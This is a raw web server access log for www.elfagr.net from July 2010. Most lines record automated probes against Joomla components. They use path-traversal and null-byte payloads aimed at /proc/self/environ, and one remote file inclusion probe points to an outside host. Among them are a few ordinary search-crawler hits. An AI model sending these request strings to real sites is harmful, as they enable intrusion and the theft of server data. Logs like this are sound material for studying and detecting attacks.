67.148.93.62 - - [01/Jul/2010:13:46:48 -0700] "GET /index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
222.236.47.182 - - [01/Jul/2010:13:47:22 -0700] "GET /logs/access_091015.log////?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [01/Jul/2010:13:47:22 -0700] "GET ///?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1466 "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [01/Jul/2010:13:47:23 -0700] "GET /logs////?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 4806 "-" "libwww-perl/5.79" "www.elfagr.net"
222.236.47.182 - - [01/Jul/2010:13:47:41 -0700] "GET /logs/access_091119.log////?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:13:49:33 -0700] "GET /logs/access_091217.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:13:49:38 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:13:49:55 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
67.148.93.62 - - [01/Jul/2010:13:53:16 -0700] "GET /index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:13:56:24 -0700] "GET /logs/access.log//index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:13:56:43 -0700] "GET /index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:13:56:38 -0700] "GET /logs//index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
92.243.84.187 - - [01/Jul/2010:13:56:48 -0700] "GET /plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder= HTTP/1.0" 404 - "www.elfagr.net/plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/tinybrowser.php?type=file&folder=" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90)" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:13:59:18 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:13:59:32 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
202.60.234.22 - - [01/Jul/2010:14:00:51 -0700] "GET /logs//index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:01:33 -0700] "GET /logs/access.log//index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:01:43 -0700] "GET /index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:01:39 -0700] "GET /logs//index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:02:02 -0700] "GET /logs/access_091112.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
67.148.93.62 - - [01/Jul/2010:14:02:50 -0700] "GET /logs/access.log//index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
67.148.93.62 - - [01/Jul/2010:14:03:05 -0700] "GET /index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
67.148.93.62 - - [01/Jul/2010:14:02:57 -0700] "GET /logs//index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
202.60.234.22 - - [01/Jul/2010:14:04:23 -0700] "GET /logs//index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:05:21 -0700] "GET /logs/access_091029.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:05:23 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:05:39 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:05:40 -0700] "GET /logs/access_091029.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:05:41 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:05:43 -0700] "GET /logs/access.log//index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:05:33 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:05:45 -0700] "GET /index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:05:45 -0700] "GET /logs//index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:07:13 -0700] "GET /logs/access_091217.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:07:19 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:07:31 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
67.148.93.62 - - [01/Jul/2010:14:07:24 -0700] "GET /logs/access.log//index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
67.148.93.62 - - [01/Jul/2010:14:07:36 -0700] "GET /index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:07:40 -0700] "GET /logs/access.log//index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:07:42 -0700] "GET /index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
67.148.93.62 - - [01/Jul/2010:14:07:53 -0700] "GET /logs//index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:08:47 -0700] "GET /logs/access_091015.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:18:18 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:18:27 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:19:18 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:19:13 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:32:10 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:32:19 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
67.148.93.62 - - [01/Jul/2010:14:36:06 -0700] "GET /index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:38:01 -0700] "GET /logs/access_091217.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:37:53 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:37:54 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
67.148.93.62 - - [01/Jul/2010:14:38:21 -0700] "GET /logs/access.log//index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
67.148.93.62 - - [01/Jul/2010:14:38:42 -0700] "GET /logs//index2.php?option=com_janews&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:14:39:08 -0700] "GET /logs/access_091015.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
67.148.93.62 - - [01/Jul/2010:14:45:48 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
67.148.93.62 - - [01/Jul/2010:14:48:45 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.813" "www.elfagr.net"
85.17.199.105 - - [01/Jul/2010:15:06:38 -0700] "GET /logs//index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
85.17.199.105 - - [01/Jul/2010:15:06:49 -0700] "GET /index.php?option=com_remository&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:15:13:31 -0700] "GET /logs/access_091217.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:15:13:43 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:15:13:39 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
202.60.234.22 - - [01/Jul/2010:15:21:22 -0700] "GET /logs/access_091029.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:15:22:12 -0700] "GET /logs/access_091112.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
66.249.65.53 - - [01/Jul/2010:15:26:32 -0700] "GET /index_files/image4591.gif HTTP/1.1" 200 1478 "-" "Googlebot-Image/1.0" "www.elfagr.net"
67.218.116.169 - - [01/Jul/2010:15:31:26 -0700] "GET /index_files/?N=D HTTP/1.1" 200 7688 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)" "elfagr.net"
67.195.111.171 - - [01/Jul/2010:15:57:20 -0700] "GET /?N=A HTTP/1.0" 200 1449 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:16:01:23 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:16:01:25 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:16:01:26 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:16:08:17 -0700] "GET /logs/access.log//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:16:08:19 -0700] "GET /index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
148.233.85.135 - - [01/Jul/2010:16:08:20 -0700] "GET /logs//index.php?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
200.125.196.34 - - [01/Jul/2010:16:27:21 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
200.125.196.34 - - [01/Jul/2010:16:27:32 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
200.125.196.34 - - [01/Jul/2010:16:27:50 -0700] "GET /logs//index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
200.125.196.34 - - [01/Jul/2010:16:27:51 -0700] "GET /index.php?option=com_rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.elfagr.net"
217.146.36.246 - - [01/Jul/2010:16:28:04 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
217.146.36.246 - - [01/Jul/2010:16:27:59 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
67.195.111.171 - - [01/Jul/2010:16:29:30 -0700] "GET /test/?M=D HTTP/1.0" 200 644 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.elfagr.net"
88.250.57.232 - - [01/Jul/2010:16:34:28 -0700] "GET /logs/access_100630.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "www.elfagr.net"
62.44.82.118 - - [01/Jul/2010:17:22:06 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
208.96.143.10 - - [01/Jul/2010:17:24:19 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.830" "www.elfagr.net"
62.44.82.118 - - [01/Jul/2010:17:27:00 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
202.60.234.22 - - [01/Jul/2010:17:30:25 -0700] "GET /logs/access_091029.log//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
202.60.234.22 - - [01/Jul/2010:17:30:26 -0700] "GET /index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
202.60.234.22 - - [01/Jul/2010:17:30:37 -0700] "GET /logs//index.php?option=com_kochsuite&Itemid=&mosConfig_absolute_path=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.elfagr.net"
62.44.82.118 - - [01/Jul/2010:17:32:12 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
62.44.82.118 - - [01/Jul/2010:17:32:02 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
62.44.82.118 - - [01/Jul/2010:17:32:02 -0700] "GET /logs//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
38.108.67.25 - - [01/Jul/2010:17:33:20 -0700] "GET /robots.txt HTTP/1.0" 200 37 "-" "SBIder/Nutch-1.0-dev (http://www.sitesell.com/sbider.html)" "www.elfagr.net"
38.108.67.25 - - [01/Jul/2010:17:33:31 -0700] "GET /_private/ HTTP/1.0" 403 - "-" "SBIder/Nutch-1.0-dev (http://www.sitesell.com/sbider.html)" "www.elfagr.net"
213.195.215.200 - - [01/Jul/2010:17:35:17 -0700] "GET /scanhttp://myhomemygarden.com.au/images/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.elfagr.net"
213.195.215.200 - - [01/Jul/2010:17:35:17 -0700] "GET /logs/scanhttp://myhomemygarden.com.au/images/test.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "www.elfagr.net"
62.44.82.118 - - [01/Jul/2010:17:36:54 -0700] "GET /index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
217.146.36.246 - - [01/Jul/2010:17:47:00 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
217.146.36.246 - - [01/Jul/2010:17:46:50 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
217.146.36.246 - - [01/Jul/2010:17:47:00 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
217.146.36.246 - - [01/Jul/2010:17:48:31 -0700] "GET /logs/access.log//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
217.146.36.246 - - [01/Jul/2010:17:48:31 -0700] "GET /index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
217.146.36.246 - - [01/Jul/2010:17:48:21 -0700] "GET /logs//index.php?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.elfagr.net"
62.44.82.118 - - [01/Jul/2010:17:49:34 -0700] "GET /logs/access.log//index.php?option=com_ninjarsssyndicator&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.elfagr.net"
